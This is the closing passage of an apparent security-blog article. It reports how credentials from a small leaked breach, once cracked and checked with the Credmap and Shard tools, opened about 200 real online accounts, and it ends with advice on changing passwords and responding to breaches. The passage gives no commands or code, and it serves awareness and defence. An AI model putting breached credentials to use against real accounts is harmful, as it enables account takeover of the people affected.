In total (omitting the BitBucket data), the compromised accounts consisted of 61 from Twitter, 52 from Reddit, 17 from Facebook, 29 from Scribd, 23 from Microsoft, and a handful from Foursquare, Wunderlist, and Kijiji. Roughly 200 online accounts compromised as a result of a small data breach in 2017.

And keep in mind, neither Credmap nor Shard check for password reuse against Gmail, Netflix, iCloud, banking websites, or smaller websites that likely contain personal information like BestBuy, Macy's, and airline companies.

If the Credmap and Shard detections were updated, and if I had dedicated more time to crack the remaining 57% of hashes, the results would be higher. With very little effort and time, an attacker is capable of compromising hundreds of online accounts using just a small data breach consisting of 1,100 email addresses and hashed passwords.

A motivated attacker with 8 million or 26 million unique datasets would be able to cause major destruction across thousands of online accounts.

Don't Ignore Data Breaches...

If you don't want your usernames and passwords showing up in any of these leaked databases, there are a few obvious things you can do:

  • Change your passwords. Right now. And make them strong. Use a proper password manager like KeePassX or LastPass to store all of your sensitive data. Take an afternoon and reset all of your passwords, even the small gaming accounts you forgot you signed up for.
  • Pay attention. Stay current with data breaches as they happen. There are many reputable news outlets that provide hacker-related news as it occurs.
  • React. When data breaches happen, don't ignore them. If you've ever been affiliated with the website affected by a breach, change your password immediately. If you're not using the account anymore or don't absolutely need it, delete it. Don't think a website is too small to be compromised. A hacker can easily pivot from one small account to your primary email address. It's possible.

Until next time, follow me on Twitter @tokyoneon_ and GitHub. And as always, leave a comment below or message me on Twitter if you have any questions.

Cover photo by Justin Meyers/Null Byte

Comments

No Comments Exist

Be the first, drop a comment!